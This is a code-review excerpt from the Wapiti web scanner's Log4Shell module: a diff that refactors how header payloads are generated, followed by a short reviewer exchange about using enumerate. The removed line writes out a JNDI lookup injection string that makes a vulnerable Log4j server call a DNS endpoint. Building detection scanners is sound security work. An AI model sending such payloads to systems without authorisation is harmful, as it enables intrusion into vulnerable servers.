wapitiCore/attack/mod_log4shell.py

```diff
@@ -95,14 +139,42 @@ async def _get_malicious_headers(self, headers: List[str]) -> Tuple[Dict, Dict]:
 
             for header in header_batch:
                 header_uuid = uuid.uuid4()
-                malicious_header[header] = "${jndi:dns://" + f"{self.dns_endpoint}/{header_uuid}" + ".l}"
+                malicious_header[header] = self._generate_payload(header_uuid)
                 headers_uuid_record[header] = header_uuid
             batch_malicious_headers.append(malicious_header)
 
         return batch_malicious_headers, headers_uuid_record
 
+    def _inject_payload(
+        self,
+        original_request: Request,
+        params: List[Tuple[str, str]],
+    ) -> Tuple[Request, str, uuid.UUID]:
+        for idx in range(0, len(params)):
```

Comment:
use `enumerate` instead

Reply:
I don't use the param, I only use the idx